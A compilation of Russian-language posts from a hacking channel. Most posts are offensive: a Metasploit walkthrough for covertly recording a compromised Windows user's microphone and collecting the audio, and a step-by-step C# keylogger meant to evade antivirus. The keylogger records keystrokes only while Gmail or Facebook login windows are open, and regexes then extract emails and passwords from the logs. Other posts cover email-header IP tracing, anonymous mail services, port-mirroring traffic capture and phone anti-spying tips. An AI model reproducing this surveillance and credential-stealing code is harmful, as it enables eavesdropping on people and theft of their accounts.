DARK SOFT

Инструменты и техники DDoS-атак

2020-07-26T11:47:14.979Z

Микрофоны, встроенные в ноутбуки, могут использоваться процессами и службами, запущенными на компьютере под управлением Windows без какого-либо уважения к вопросам безопасности. Это позволяет хакерам легко злоупотреблять доверием пользователей к Windows и к сторонним приложениям, делая аудиозаписи с помощью микрофона скомпрометированного компьютера. После того как хакер создаст полезную нагрузку и установит бэкдор на уязвимом компьютере с Windows 10, он может использовать meterpreter из фреймворка Metasploit для выполнения различных атак, таких как создание скриншотов и перехват нажатий клавиш, кража паролей и извлечение удаленных файлов. Сегодня мы расскажем, как хакер может использовать микрофон своей жертвы для подслушивания.

Шаг 1. Незаметная запись звука

В Metasploit есть специальный модуль record_mic, который можно использовать для создания аудиозаписей с взломанного компьютера. Чтобы начать использовать модуль record_mic, введите следующую команду:

use post/multi/manage/record_mic

Доступные параметры модуля можно просмотреть с помощью команды options.

Параметр DURATION определяет длину аудиозаписи, записываемую через микрофон цели. Команду set нужно будет использовать, чтобы установить продолжительность записи звука в секундах.

set DURATION 30

Следующий параметр — идентификатор сессии (SESSION) нужно будет указать в параметрах модуля. Команда sessions поможет просмотреть все доступные скомпрометированные устройства.

sessions

Установите идентификатор SESSION, используя следующую команду:

set SESSION 1

После того, как вы выставили эти параметры, можете начать запись звука на целевом компьютере с помощью команды run.

Консоль msf будет сообщать вам о ходе процесса записи. По завершении записи созданный аудиофайл в формате WAV будет автоматически сохранен в директории /root/.msf4/loot/.

Шаг 2. Как найти записанные аудиофайлы

Чтобы получить доступ к только что созданной аудиозаписи, которая сохранена на VPS, находясь в консоли msf, перейдите с помощью команды cd в каталог /loot/.msf4/loot/.

cd /root/.msf4/loot/

Затем используйте Python3 для того, чтобы запустить простой HTTP-сервер на 8080-м порту, используя следующую команду. Аргумент -m вызывает модуль «http.server» Python3, а 8080 — это номер порта, на котором будет запущен веб-сервер:

python3 -m http.server 8080

Несмотря на то, что сервер Python3 будет работать как временный веб-сервер, терминал msf уже не будет использоваться. Тем не менее в этом случае у вас появляется возможность просматривать список созданных аудиофайлов с помощью любого веб-браузера и из любой точки мира — просто введите IP-адрес VPS-сервера в адресную строку браузера и добавьте номер порта (8080) через двоеточие:

http://IP_адрес_вашего_VPS:8080/

Чтобы остановить веб-сервер Python3 и выйти в консоль нажмите Ctrl+C.

Шаг 3. Воспроизведение записанных аудиофайлов

Большинство веб-браузеров по умолчанию не воспроизводят WAV-аудиофайлы, поэтому файлы придется сохранить куда-нибудь на ваш жесткий диск и прослушивать с помощью аудиоплеера. Audacity — популярный аудиоплеер, доступный в репозиториях Kali, его можно установить с помощью следующей команды:

sudo apt-get install audacity

После того, как Audacity будет установлен, кликните правой кнопкой мыши по скаченному WAV-файлу и откройте его с помощью Audacity, что позволит прослушать записанный звук.

Заключение

Если на вашем компьютере с Windows установлен бэкдор, как мы это делали, то вы видите насколько легко хакерам прослушивать все, что вы говорите. Хоть они и не могут слышать это в режиме реального времени, но они могут прослушать сделанные записи, когда захотят и где захотят. Чтобы этого не произошло:

Используйте AppArmor. Система безопасности, спроектированная для таких операционных систем Linux, как Ubuntu, может запретить некоторым приложениям доступ к определенным частям компьютера. Например, открытие вредоносного PDF-файла, когда приложение для просмотра PDF не имеет доступа к микрофону, предотвратит такую атаку.
Используйт Qubes. Qubes обеспечивает безопасность путем разделения. Это позволяет пользователям разделить различные части своих действий на компьютере на безопасно изолированные отсеки. Qubes, возможно, самая безопасная операционная система для десктопов. Пользователям Windows сначала может быть будет трудно ее использовать, но если безопасность ОС — в приоритете, то Qubes будет очень подходящим решением.
Физически удалите микрофон. Если микрофон не является абсолютно необходимым для работы, а безопасность важна, то это наиболее предпочтительный вариант.
Защитите свой компьютер от бэкдоров. Хотя все вышеперечисленное полезно, когда у вас уже установлен в системе бэкдор, но лучше всего как раз убедиться, что уязвимости вашей системы вообще не эксплуатируют.

Как определить IP адрес по E-mail?

2020-07-24T15:42:47.548Z

Вам могут прислать письмо, например, от «Яндекс.Деньги» (или «Киви-Кошелек», «Сбербанк-онлайн» и пр.). Перейдя по ссылке из такого сообщения, вы попадете на поддельный сайт (максимально повторяющий оригинал) и там добровольно отдадите все свои персональные данные (включая пароль). А дальше с ними можно делать все что угодно: переводить и обналичивать деньги, делать покупки онлайн и даже оформлять на ваше имя кредиты в микрофинансовых организациях.

Для того, чтобы не попасться на удочку таких мошенников, необходимо уметь отличать подобные рассылки от настоящих. Как это делать – разберем в нашей статье.

Анатомия электронного письма

Отправляя и получая электронные письма, рядовой пользователь редко задумывается о том, что с этими письмами происходит по пути следования. Доставка осуществляется за считанные секунды, независимо от места нахождения адресата. Мы получаем сообщения, фотографии, видео, полезные ссылки и массу другой информации. Мама высылает рецепты дочери, коллеги друг другу – отчеты и рабочие материалы, банки и кредитные организации – информацию о задолженности, операциях по счету и пр.

Нам кажется, что общение происходит напрямую: из рук в руки. Однако это не совсем так. В процессе отправки и получения, помимо компьютеров отправителя и получателя, принимают участие еще как минимум два почтовых сервера.

Схематично процесс отправки электронного письма выглядит так:

Маршрутизация прохождения E-mail

Каждый из них работает по определенным правилам, которые регулируются специальными протоколами: SMTP (Simple Mail Transfer Protocol) – передача почты, POP3 (Post Office Protocol, версия 3) – прием почты или IMAP – доступ к почтовым ящикам, находящимся на почтовом сервере.

Буквально за секунды, которые занимает пересылка вашего письма, почтовые сервисы дополняют его массой информации. Например, мною через Mail.ru было получено вот такое лаконичное письмо (всего на 4 строчки текста) якобы от международной торговой компании Амазон. Почтовый сервер услужливо определил его как спам и отправил в соответствующую папку. Как он пришел к такому решению?

Для того чтобы увидеть информацию, добавляемую почтовыми серверами, необходимо нажать на кнопку «Еще» верхней командной строки:

После этого нажать на нижнюю строчку выпадающего списка под названием «Служебные заголовки»:

В отдельном окне откроется та самая служебная информация, которую добавляют к любому электронному письму почтовые серверы:

Впечатляет? И это все к сообщению на 4 строки! Помимо адреса отправителя и получателя, здесь перечислены даты и время отправки, IP-адрес отправителя, индивидуальный номер сообщения и масса других служебных сведений.

Если вы используете другие почтовые сервисы, то там тоже есть возможность получить необходимую информацию. Например, в другом популярном почтовом сервисе – Gmail – необходимо нажать на три точки в верхнем правом углу (заголовок электронного письма) и далее выбрать строку «Показать оригинал»:

В новом окне можно будет увидеть идентификатор сообщения, от кого и кому направлено письмо.

Чем же нам может быть полезна эта информация? Наиболее ценными из всего этого являются сведения об IP-адресе.

Как найти IP адрес через служебный заголовок письма.

Если вы никогда не сталкивались с понятием IP-адрес – прочитать о нем подробнее можно здесь, здесь или здесь. Зная его, можно получить много ценных сведений об отправителе электронного сообщения. Находим значение IP в тексте служебного заголовка письма:

Поскольку письма могут перенаправляться через несколько серверов, то при наличии нескольких IP в разделе «Служебный заголовок» нужно смотреть тот, который, как правило (но не всегда), расположен ниже других. Необходимое нам цифровое значение должно находится в разделе «Received», тогда как в разделе «From» (нижняя строчка) указан якобы адрес Амазона (именно содержимое данного поля мошенники и подделывают, чтобы выдать себя за кого-то другого).

Если нет желания копаться в служебных заголовках, то еще проще определить IP отправителя через наш сервис: Определение IP адреса по Е-mail.

Порядок действий при этом следующий:

Открываете сомнительное письмо, адрес которого нужно проверить.
Пересылаете его на специальный адрес: knowemailip@gmail.com.
Через несколько секунд вносите электронный адрес подозрительного отправителя в окно нашего сервиса.
Нажимаете кнопку «Проверить»:

Воспользоваться данным сервисом можно через почтовые клиенты, например – через The Bat.

Информация на сервере хранится не более часа, поэтому все действия лучше выполнять в течение этого времени (и отправку письма, и проверку через «Определение IP-адреса по E-mail».

Что делать дальше с полученным IP адресом?

Полученный IP адрес не поможет определить абсолютно точный почтовый адрес отправителя, но укажет регион расположения сервера, организацию, на которую проводилась регистрация, и данные о провайдере.

Для определения местонахождения можно воспользоваться несколькими сервисами. Например, через этот: "Определить месторасположение". По умолчанию он определяет ваше местонахождение.

Вводим в окно поиска IP адрес, который нашли в служебном заголовке или получили через наш сервис «Определение IP-адреса по E-mail» и нажимаем кнопку «Проверить»:

Данные о местонахождении выводятся в виде интерактивной карты с краткой сопроводительной информацией о стране, городе, организации и провайдере интересующего нас IP.

Таким образом выясняется, что «электронный перевод» мне «пытаются» сделать из Швеции, тогда как покупки в Амазоне я делаю исключительно через Великобританию. Такое, конечно, бывает: офисы международных компаний могут находиться в разных странах. Но может и насторожить. Особенно, если точно известно, где находятся представительства фирм, от лица которых вы получаете рассылки. Аналогичную проверку можно провести и при получении странных писем через контакты на сайтах знакомств: пишут якобы из США или Италии, а IP- адрес определяется в Ереване или ближайшем Подмосковье.

О проблемах с данным письмом мне сообщает и почтовый сервер Mail.ru, который не считает этот адрес «одобренным отправителем» и автоматически помещает сообщения от него в папку «Спам». Mail.ru (так же как и другие «почтовики») проводит автоматическое сравнение параметров из полей ««Received» и «From» служебного заголовка и, если они не совпадают – относит такие послания к сомнительным. При переходе по ссылке из такого письма я вместо перевода рискую получить только массу неприятностей.

Аналогичным образом работает и сервис по определению местонахождения по IP адресу под названием Информация об IP адресе или домене.

Для получения сведений нужно ввести цифровое значение IP и нажать на кнопку «Проверить»:

В итоговой выдаче можно увидеть не только регион расположения провайдера и его название, но и контактные данные. При желании можно подать жалобу на спам-рассылку по указанному телефону или почтовому адресу:

Подделка заголовков писем

Как мы видим из разобранного примера, для мошенников не составляет особого труда частично подделать заголовок письма. Довольно часто это практикуется для того, чтобы выдать себя за представителя известной компании или сервиса.

Например, можно выслать вредоносную программу с адреса Яндекса под видом письма от сотрудника службы поддержки:

После открытия раздела «Служебный заголовок» можно выяснить, что реальный адрес отправителя совершенно другой, а письмо пересылалось с использованием других адресов и сервисов.

При этом IP-адрес отправителя находится в Иркутске:

Использующие подобные схемы мошенничества часто подстраиваются под рассылки сервисов онлайн платежей, почтовых служб, банков и кредитных организаций, социальных сетей, популярных служб знакомств и пр.

Будьте бдительны при получении сомнительных писем и научите этому своих пожилых родителей и детей, которые еще не освоили в полной мере тонкости общения в сети. Научите их распознавать основные признаки мошенничества и ни в коем случае не выполнять действий, о которых просят в письме.

Проверяйте, проверяйте и еще раз проверяйте! Тем более, что определить истинный адрес отправителя и сведения о его месторасположении достаточно легко.

Лучшие анонимные почтовые сервисы

2020-07-23T08:55:32.430Z

1. Proton Mail

URL-адрес Clearnet: https://protonmail.com/

Лук URL: https://protonirockerxow.onion/login

Протонная Почта, вероятно, является одним из наиболее профессионально поддерживаемых анонимных почтовых сервисов.

Это я утверждаю, основываясь на том факте, что большинство других анонимных почтовых сервисов не имеют профессионально поддерживаемого URL-адреса clearnet, или даже если они это делают, страницы довольно просты без большой информации об их услугах.

В то время как с Proton Mail, их clearnet URL объясняет все, что вам нужно знать об их анонимных почтовых службах.

Заметные Особенности ProtonMail:

Открытый исходный код: когда я собираюсь доверить какой-то компании свою анонимность и конфиденциальность, это всегда помогает, если они с открытым исходным кодом. Это помогает нам проанализировать код для себя и увидеть, действительно ли они предоставляют то, что обещают. Кроме того, будучи открытым исходным кодом, он гарантирует, что они ничего не скрывают, поэтому, даже если вы не очень “кодер”, это все равно повышает уверенность.

Автоматическое Одноранговое шифрование: письма шифруются автоматически от отправителя к получателю,и шифрование даже не предоставляет доступ к команде ProtonMail. Так что да, это безопасно.

Никакие личные данные не требуются: даже для регистрации на платформе не требуется никакой личной информации, такой как имена, дата рождения или любые другие подобные данные.

Политика отсутствия журналов: веб-сайт сам по себе не хранит никаких IP-журналов.

Швейцарские серверы: Швейцария обычно популярна своими "банками", но она также сохраняет тот же уровень анонимности и конфиденциальности для своих серверов, и именно там размещаются серверы Proton Mail.

Простой в использовании интерфейс: пользовательский интерфейс, в отличие от большинства других анонимных почтовых сервисов, не является “базовым”, но он точно отражает Gmail. Так что да, это еще одна причина, чтобы пойти с ProtonMail, а также.

Proton Mail позиционирует себя как “анти-АНБ”, хотя это спорно, но это, безусловно, один из ближайших анонимных почтовых сервисов анти-АНБ, с которыми вы пересекаетесь.

Более того, у них даже есть iOS, Android и Web (clearnet).

2. ParanoidPi

URL-адрес Clearnet: https://paranoid.email/

Лук URL: https://paranoid2ezdphvm.onion/

Это анонимный почтовый сервис, разработанный ParanoidPi. Как следует из названия, они “параноики” и, как говорится, “выживают только параноики”. Так что да, без сомнения, они преданы делу.

Некоторые заметные особенности PraranoidPi:

100% Nat (Network Address Translation) Cloak: это означает, что каждый бит электронной почты скрыт и выполняется за NAT. Начиная прямо с шифрования, расшифровки и заканчивая закрытыми ключами, ничто не остается на волю случая.

Гарантированное шифрование: бывают случаи, когда почта не шифруется с конца отправителя. В этом случае ParanoidPi шифрует электронные письма с их конца, используя наши (пользователей) лобковые ключи.

OpenPGP Encrypted: если вы находитесь в глубокой / темной паутине уже довольно долгое время и отважились на глубокие веб-рынки, в этом случае вы, возможно, уже знаете, что такое шифрование PGP. Это в основном Одноранговое шифрование, которое позволяет людям шифровать и расшифровывать сообщения с помощью закрытых ключей, и только владельцам ключей предоставляется доступ к сообщению.

Автоматический отказ: их 2048 и 4096 битное шифрование гарантирует, что ваши почтовые ящики получают только зашифрованные письма, если нет, они отскакивают и, следовательно, не достигают вашего почтового ящика, предотвращая любую угрозу или перехват, который мог бы произойти.

Paranoid Infrastructure Routing: в случае, если вы находитесь на своем собственном домашнем IP-адресе, даже тогда нет никакого риска для безопасности вашей электронной почты, потому что все маршрутизируется через Paranoid Infrastructure. Это также решает дополнительные проблемы "спам-фильтров", а также DynIPs.

И это еще не все, они скоро запустят “VPN-туннели” для получения электронной почты SMTP.

3. Daniel Winzen’s Platform

URL-адрес Clearnet: https://danwin1210.me/mail/

Это совершенно частный сервер электронной почты и XMPP, разработанный Даниэлем Винценом, и он бесплатно делится им со всем миром.

Наряду с бесплатными анонимными почтовыми сервисами, он также может похвастаться услугами чата, сокращениями URL и парой других личных проектов.

В почтовом сервисе Даниэля не так много технических деталей, кроме того, что он зашифрован, безопасен и прост в интерфейсе.

Наряду с идентификатором электронной почты, он также предоставляет пользователям XMPP, а также учетную запись jabber, веб-почта по умолчанию на платформе Даниэля имеет 25 МБ пространства.

Так что пока он используется с жесткой рукой, и только для чрезвычайно срочных и безопасных разговоров, этого должно быть достаточно. Но пространство также можно расширить, просто отправив письмо Даниэлю.

4.AnonMail Onion Mail Server

URL-адрес Clearnet: https://onionmail.info/

Лук URL: http://wc2eyfmw7wrwomf4.onion

У Почты Onion есть несколько серверов, из которых вы можете выбрать, приведенный выше сетевой URL-адрес Onion-это только один из них.

Большинство других серверов имеют те же функциональные возможности и функции, так что картина для этого одного URL-адреса также означает, что вы можете использовать другие серверы из списка взаимозаменяемо.

Основные функции или почтовая служба AnonMail Onion:

100% зашифрованные письма, в отличие от обычных SMTP-писем, которые мы используем с поставщиками clearnet без какого-либо шифрования (такого уровня!)

На общедоступном сервере нет хранилища файлов и почты, это разрешено только серверу получателя.

Федеративные серверы убедитесь, что сертификаты SSL всегда актуальны и функционируют!

Пользователь получает возможность выбрать сервер ввода/вывода узлов!

Защищенный асимметричными ключами, этот вид защиты включает в себя ваш пароль и ключи сервера для защиты.

Позволяет устанавливать пользовательские, личные черные списки, что помогает убедиться, что в вашем почтовом ящике есть минимум спама.

Короче говоря, это довольно безопасный и надежный анонимный почтовый сервис. Хотя один фактор, который я хотел бы упомянуть, заключается в том, что он не шифрует автоматически PGP ваши электронные письма, и это то, о чем вы должны позаботиться с вашего собственного конца.

5. SinBox

Лук URL: http://sinbox4ywhkabur3.onion/

SinBox является одним из самых простых анонимных почтовых сервисов в сети Tor. Он не имеет URL-адреса clearnet и абсолютно не связан с clearnet.

Это децентрализованная служба, которая гарантирует, что шифрование, расшифровка и аутентификация выполняются локально.

На самом деле, вам предоставляется частный “ключ”, который вам нужно загрузить и сохранить. Это похоже на ваш” ключ аутентификации", и Sinbox его не хранит. Он необходим для входа в вашу учетную запись и автоматически удаляется с серверов Sinbox, как только вы выходите из системы.

Помимо отправки электронной почты, другие "ребра" включают в себя возможность отправлять и получать файлы, включая фотографии, видео и другие носители.

И более того, он “неограничен”. Таким образом, вы можете использовать столько места для ваших почтовых требований, сколько пожелаете.

Как перехватить трафик в коммутируемой среде?

2020-07-21T08:00:46.337Z

Анализ сетевого трафика всегда был неотъемлемой частью работы любого сетевого инженера, администратора сети для выявления проблем работоспособности и конфигурации активного оборудования, а также специалистов по информационной безопасности для выявления аномальной сетевой активности вредоносного программного обеспечения.

Анализ перехваченных пакетов безусловно требует от специалиста наличие глубоких знаний в области сетевых технологий, а также навыков работы с программным обеспечением анализаторов пакетов, таким например, как всем известный wireshark, так как необходимо знать синтаксис фильтров, уметь быстро находить интересующие протоколы и т.д.

Но гораздо сложнее это трафик перехватить, точнее установить оборудование для его перехвата.

Так как же перехватить трафик?

Как расположить и настроить оборудование для прослушивания ?

Предлагаю рассмотреть варианты расположения (подключения) оборудования для снифа в коммутируемой среде (перехват wi-fi канала рассмотрим в следующей статье).

Самым удобным способ является установка сниффера непосредственно на интересующем нас прослушиваемом хосте.

Однако часть трафика, весьма полезная для исследования, но не предназначенное конечному устройству будет отбрасываться сетевым интерфейсом и не передаваться на обработку в систему, а значит и захватить этот трафик для дальнейшего исследования мы не сможем. К такому трафику относятся широковещательный трафик в рамках работы коммутатора.

К примеру ARP запрос, который используют хосты для определения MAC-адреса, который соответствует определенному IP-адресу.

Зная IP, направляем ARP запрос с целью сопоставления IP-MAC всем устройствам внутри широковещательного домена.

Однако только искомый хост «заинтересован» в получении такого запроса, остальные хосты, как упоминалось выше, указанный пакет отбросят.

Для наглядности, с помощью Cisco Packet racer, рассмотрим как хост с IP-адресом 192.168.1.2 направляет ARP запрос на хост 192.168.1.4.

Предварительно проверив, что ARP записей на 192.168.1.2 нет от слова совсем командой arp -a (удалить их можно с помощью arp -d) выполняем команду ping на 192.168.1.4.

Так как мы не знаем MAC адрес, то первоначально направляем ARP запрос. Запрос приходит на коммутатор (cisco 2960), далее он направляется на все хосты, подключенные к коммутатору. После этого хост 192.168.1.3 отбрасывает указанный, а 192.168.1.4 соответственно отвечает.

Для того, чтобы захватывать весь поступающий траффик на 192.168.1.3 необходимо на сетевом интерфейсе включить смешанный режим раюоты. Это позволяют сделать программные компоненты Aircrack-ng, Wireshark, tcp dump идр.

Когда нет возможности разместить анализатор трафика на целевом хосте помочь может концентратор.

В таком случае исследуемый хост и анализатор трафика в одном коммутируемом сегменте сети подключаются к одному концентратору.

В результате все поступающие и исходящие пакеты будут проходить по всем портам концентратора.

Так например, отправив пакеты с Host1 на Host2, концентратор Hub0 направит их как на исследуемый Host2, так и на анализатор пакетов Sniffer.

Отброс пакетов Sniffer’ом на картинке, обусловлен отключенным смешанным режимом работы сетевого адаптера.

Самым популярным способом перехвата трафика остается метод зеркалирование портов.

Для реализации этого метода необходимо чтобы коммутатор был управляемым, а также иметь физический или через удаленный ssh/Web-интерфейс доступ к нему.

Смысл заключается в том, чтобы принимаемый и отправляемый трафик устройства подключённого к порту коммутатора — зеркально направлялся на другой порт коммутатора, куда подключен анализатор трафика.

Так, подключившись, настроим коммутатор Сisco 2960 для зеркалирования трафика на портах fastEthernet 0/1 и fastEthernet 0/2 куда подключены host1 и host2 соответственно:

Switch>enable
Switch#conf terminal
Switch(config)#monitor session 1 source interface fastEthernet 0/1
Switch(config)#monitor session 1 source interface fastEthernet 0/2

И порт, на который будет зеркалироваться трафик, куда подключен анализатор пакетов :

Switch(config)#monitor session 1 destination interface f0/24

Проверим:

Switch#show monitor
Session 1
---------
Type                   : Local Session
Description            : -
Source Ports           :
Both               : Fa0/1,Fa0/2
Destination Ports      : Fa0/24
Encapsulation      : Native
Ingress      : Disabled

Итак направим пакеты от Host1 (192.168.1.1) на Host2( 192.168.1.2) и видим, что они зеркалируются коммутатором наш сниффер:

Открываем перехваченный ICMP пакет на снифере:

Указанные методы не лишены недостатков, а другие методы перехвата сетевого трафика — такие как заражение ARP-кэша и применение сетевых ответвителей рассмотрим в следующих статьях.

15 советов для защиты от шпионажа за смартфоном

2020-07-18T09:36:22.387Z

В этой статье были перечислены основные способы, о которых нужно знать для защиты телефона от шпионажа.

Мобильные телефоны уже давно стали неотъемлемой частью нашего личного пространства. Однако с ростом числа киберпреступлений и популярностью приложений от сторонних разработчиков, конфиденциальность данных, хранимых на мобильных устройствах, все чаще подвергается угрозам разного рода. Компании и кибермошенники изобретают разные способы, чтобы получить доступ к личной информации для последующего использования в собственных целях.

С другой стороны, большинство пользователей не хотят, чтобы персональные данных попали в чужие руки, особенно без разрешения, и в этой статье мы рассмотрим способы защиты от шпионажа за вашим телефоном со стороны хакеров, сторонних приложений, близких родственников и т.п.

1. Никогда не оставляйте свой телефон без присмотра

Первое и самое главное: постоянно следите и никогда не оставляйте телефон на столике в кафе, на скамейке в парке и других общедоступных местах, поскольку некоторые злоумышленники специализируются на кражах подобного рода.

2. Никому не давайте телефон

Даже маме. В этом случае возникают риски, связанные с установкой приложений для шпионажа или с посещением вредоносных сайтов.

3. Избегайте подключений к публичным беспроводным сетям без VPN

Во время нахождения в общественных местах старайтесь не подключаться к публичным Wi-Fi сетям, поскольку хакер может легко проникнуть эту сеть или создать поддельную точку доступа и после подключения получить доступ к вашим данным. Если подключаться все же необходимо, используйте надежный VPN.

4. Регулярно обновляйте приложения

Старайтесь использовать последние версии приложений и устанавливайте последние обновления. Иногда патчи исправляют проблемы с безопасностью, которые могут быть использованы злоумышленником.

5. Отключите микрофон в телефоне

Во время шпионажа может быть задействовать микрофон, который желательно отключить. Вне зависимости от того, какое у вас устройство (iPhone или на базе ОС Android), вы можете отслеживать, у какого приложения есть доступ к микрофону через настройки.

6. Будьте осторожны с используемыми приложениями

Не все приложения в магазинах App Store и Google Play являются легитимными. Многие приложения от сторонних разработчиков пытаются получать о вас как можно больше информации, о чем обычно упоминается в тексте «Terms & Conditions», с которым вы должны согласиться, даже если не читали. Прежде чем загружать и использовать какую-либо программу, потратьте некоторое время и ознакомьтесь с этим текстом.

7. Используйте безопасный веб-браузер

Если вы ведете бизнес в сети или делаете покупки с телефона, важно, чтобы веб-серфинг был безопасным, и информация о вашем банковском счете, кредитной карте или номере социального страхования не оказалась в руках злоумышленников. Для защиты данных во время работы в интернете используйте браузеры Brave, DuckDuckGo и Firefox Focus.

8. Ограничьте или запретите отслеживание в маркетинговых целях

В большинстве приложений и смартфонах вы можете ограничить или совсем запретить отслеживание и сбор данных, используемых для показа более актуальных рекламных объявлений. Кроме того, нет никаких гарантий, что собранная информация не будет использоваться и в других целях.

9. В случае отсутствия необходимости отключите Wi-Fi и Bluetooth

Рекомендуется отключать на телефоне Wi-Fi и Bluetooth в случае отсутствия необходимости, поскольку при подключении к публичным сетям ваш смартфон может быть скомпрометирован. Во время прогулки или путешествия ваш телефон непреднамеренно может подключиться к ближайшей незащищенной сети.

10. Пользуйтесь антивирусом

Как и в случае с компьютером, антивирус можно использовать для защиты смартфона от вредоносных приложений или отдельных участков кода. После обнаружения подозрительной программы происходит помещение на карантин, пока не наступили серьезные последствия.

11. Не кликайте на подозрительные ссылки

Если кто-то, кого вы не знаете, просит кликнуть на ссылку, ни в коем случае не кликайте. Часто хакеры или мошенники пытаются украсть персональную или финансовую информацию, рассылая сообщения о хороших скидках или предлагая поучаствовать в лотерее. Вы можете получить ссылки по почте, в СМС, в мессенджерах или социальных сетях. Совет: пользуйтесь сервисом VirusTotal для сканирования и проверки подозрительных ссылок и файлов.

12. Удаляйте неизвестные файлы и приложения

Часто, во время внимательного изучения содержимого телефона, можно заметить неизвестные загруженные файлы или установленные приложения, которые могут свидетельствовать о присутствии шпионов и других вредоносов. Периодически делайте профилактическую зачистку своего смартфона и удаляйте неизвестное содержимое и ненужные файлы.

13. Отключите отслеживание вашей активности в интернете и в приложениях

Хотя Google – отличный источник информации, но в то же время отслеживает вашу активность в интернете и приложениях с целью лучшей персонализации при использовании сервисов навроде Google Maps. В одном из справочных разделов Гугла можно узнать, как отключить отслеживание в Android и iPhone.

14. Используйте настройки безопасности телефона

Существует несколько настроек безопасности телефона, при помощи которых можно защититься от неправомерного физического доступа к устройству и приложениям. Двухфакторная аутентификация требует, чтобы пользователь телефона или приложения прошел две стадии перед получением доступа, которые могут включать ввод пароля, использования отпечатка или секретного кода.

Также существует несколько схем авторизации, включая Face ID или сканирование отпечатка, защиту при помощи пароля или графического ключа.

15. Сбросьте настройки телефона до заводских

Если ваш телефон уже скомпрометирован, вы можете воспользоваться сбросом настроек. Однако в этом случае вместе с вредоносами удалятся все ваши данные.

HIDDEN COMMUNITY - информационная безопасность, хакинг, полезные статьи (зеркало)

Пишем свой кейлоггер с нулевым детектом. Пошаговый гайд

2020-07-17T12:46:57.577Z

Сегодня мы расскажем и покажем, как создать свой кейлоггер, который не будет обнаружен ни одним из существующих антивирусов. А все это еще и бесплатно.
Интересно? Тогда погнали!

Введение

Кейлоггер – это ПО или некое физическое устройство, которое может перехватывать и запоминать нажатия клавиш на скомпрометированной машине. Это можно представить как цифровую ловушку для каждого нажатия на клавиши клавиатуры.

Зачастую эту функцию внедряют в другое, более сложное ПО, например, троянов (Remote Access Trojans RATS), которые обеспечивают доставку перехваченных данных обратно, к атакующему. Также существуют аппаратные кейлоггеры, но они менее распространены, т.к. требуют непосредственного физического доступа к машине.

Тем не менее создать базовые функции кейлоггера достаточно легко запрограммировать.
Далее, данный код не будет оптимизирован, я всего лишь покажу вам строки кода, которые могут выполнить поставленную задачу, это не самый элегантный или оптимальный путь. Ну и наконец, я не буду рассказывать как сделать кейлоггер стойким к перезагрузкам или пытаться сделать его абсолютно беспалевным, благодаря особым техникам программирования, так же как и о защите от удаления, даже если его обнаружили.

За дело!

Для подключения к клавиатуре вам всего лишь нужно использовать 2 строки на C#:

1.  [DllImport("user32.dll")]
2.  
3.  public static extern int GetAsyncKeyState(Int32 i);

GetAsyncKeyState - эта функция определяет нажата клавиш или отжата в момент вызова и была ли нажата после предыдущего вызова. Теперь постоянно вызываем эту функцию, чтобы получать данные с клавиатуры:

1.  while (true)
2.  {
3.  Thread.Sleep(100);
4.  for (Int32 i = 0; i < 255; i++)
5.  {
6.  int state = GetAsyncKeyState(i);
7.  if (state == 1 || state == -32767)
8.  {
9.  Console.WriteLine((Keys)i);
10. 
11. }
12. }
13. }

Что здесь происходит? Этот цикл будет опрашивать каждые 100 мс каждую из клавиш для определения ее состояния. Если одна из них нажата (или была нажата), сообщение об этом будет выведено на консоль. В реальной жизни эти данные буферизируются и отправляются хакеру, т.е. нам.

Умный кейлоггер

Погодите, а есть ли смысл пытаться снимать всю подряд информацию со всех приложений?

Код выше тянет сырой ввод с клавиатуры с любого окна и поля ввода, на котором сейчас фокус. Если ваша цель – номера кредитных карт и пароли, то такой подход не очень эффективен. Для сценариев из реального мира, когда такие кейлоггеры выполняются на сотнях или тысячах машин, последующий парсинг данных может стать очень долгим и по итогу потерять смысл, т.к. ценная для взломщика информация может к тому времени устареть.

Давайте предположим, что я хочу заполучить учетные данные Facebook или Gmail для последующей продажи лайков. Тогда новая идея – активировать кейлоггинг только тогда, когда активно окно браузера и в заголовке страницы есть слово Gmail или facebook. Используя такой метод я увеличиваю шансы получения учетных данных.

Вторая версия кода:

1.  while (true) 
2.  {
3.  IntPtr handle = GetForegroundWindow();
4.  if (GetWindowText(handle, buff, chars) > 0)
5.  {
6.  string line = buff.ToString();
7.  if (line.Contains("Gmail")|| line.Contains("Facebook - Log In or Sign Up "))
8.  {
9.  //проверка клавиатуры 
10. }
11. }
12. Thread.Sleep(100);
13. }

Этот фрагмент будет выявлять активное окно каждые 100мс. Делается это с помощью функции GetForegroundWindow (больше информации на MSDN). Заголовок страницы хранится в переменной buff, если в ней содержится gmail или facebook, то вызывается фрагмент сканирования клавиатуры.

Этим мы обеспечили сканирование клавиатуры только когда открыто окно браузера на сайтах facebook и gmail.

Еще более умный кейлоггер

Давайте предположим, что хакер смог получить данные кодом, на подобии нашего. Так же предположим, что он достаточно амбициозен и смог заразить десятки или сотни тысяч машин. Результат: огромный файл с гигабайтами текста, в которых нужную информацию еще нужно найти. Самое время познакомиться с регулярными выражениями или regex. Это что-то на подобии мини языка для составления неких шаблонов и сканирования текста на соответствие заданным шаблонам. Вы можете узнать больше здесь.

Для упрощения, я сразу приведу готовые выражения, которые соответствуют именам логина и паролям:

1.  //Ищем почтовый адрес
2.  ^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$
3.  
4.  
5.  //Ищем пароль
6.  (?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])

Эти выражения здесь как подсказка тому, что можно сделать используя их. С помощью регулярных выражений можно искать (и найти!) любые конструкции, которые имеют определенный и неизменный формат, например, номера паспортов, кредитных карт, учетные записи и даже пароли.

Действительно, регулярные выражения не самый читаемый вид кода, но они одни из лучших друзей программиста, если есть задачи парсинга текста. В языках Java, C#, JavaScript и других популярных уже есть готовые функции, в которые вы можете передать обычные регулярные выражения.

Для C# это выглядит так:

1.  Regex re = new Regex(@"^[\w!#$%&amp;'*+\-/=?\^_`{|}~]+(\.[\w!#$%&amp;'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$");
2.  Regex re2 = new Regex(@"(?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])");
3.  string email = "Oded.awask@gmail.com";
4.  string pass = "abcde3FG";
5.  Match result = re.Match(email);
6.  Match result2 = re2.Match(pass);

Где первое выражение (re) будет соответствовать любой электронной почте, а второе (re2) любой цифро буквенной конструкции больше 6 символов.

Бесплатно и без детектов

В своем примере я использовал Visual Studio – вы можете использовать свое любимое окружение – для создания такого кейлоггера за 30 минут.

